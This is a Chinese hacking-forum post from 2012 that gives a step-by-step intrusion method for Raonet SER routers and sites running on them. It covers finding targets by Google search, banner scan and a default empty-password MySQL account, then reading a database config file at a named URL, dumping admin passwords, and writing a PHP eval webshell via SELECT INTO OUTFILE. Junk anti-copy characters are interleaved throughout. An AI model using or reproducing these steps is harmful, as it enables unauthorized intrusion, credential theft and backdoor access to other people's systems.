找回密码
 立即注册
查看: 3262|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:2 @2 n0 k* a; f# w/ m9 Z
. Z7 R- ?( v& |9 f; O6 A7 l) F0 v& O4 w
1:google搜索'Raonet Subscriber Ethernet Router'
, R1 o! m" Q3 X7 ^7 P1 B/ y; X2 B: h5 ?# a" s
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001" v0 P! y6 N: b- z  }9 U2 C

& e; }8 n5 m: U. O' Y7 b8 E3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。1 f% S9 A2 `0 @- Q1 I6 G- m( u
) x% e3 k. x* M
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......! b- c9 x6 N" o; q

3 @! d, R8 M) t3 D( }. Y ( c( O& t. x0 v. j/ E
8 y$ f  }7 T4 ~7 D- X
入侵步骤:
1 @& o3 S* v% w2 |8 \6 r
2 v4 m9 Z# c% d/ j. u, |0 V, u1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
- z/ p9 U7 n6 x1 b* E7 r$ s5 L; m- p& X! B
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
( k- h7 U0 y$ D  c3 r, b3:得到密码后连接,查看GUI管理密码:
* D* s1 b5 G5 tuse ser_500
5 I8 A! Y7 a& U2 x  ~/ C: Uselect id,passwd from user;3 [7 I) e4 P9 b! c6 X9 G
4:通过数据库写入webshell,执行命令:5 \9 S5 Y! Y( @) m" N. V* h
use mysql;
7 v3 E: Q2 g5 `8 h, }create table ok(cmd TEXT);% F0 N! H3 C: M! O
insert into ok values("<?php @eval($_POST[cmd])?>");
' g( ^' x; w) R5 V! x# gselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
+ \# e2 e- G0 ^7 s5 W2 a/ Udrop table ok;# Z' K( n7 D: X! P5 I  p( c' {

4 L9 i$ |. k" j2 o3 R! y) {5:连接后门shell.php
  U- V+ V  O6 F, z9 b5 y7 g5 c) j" v$ _! e
6. 搞定!
7 A, `9 X6 ]+ O; Q9 d
  B* V8 h: K# p; F# B: T4 E
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表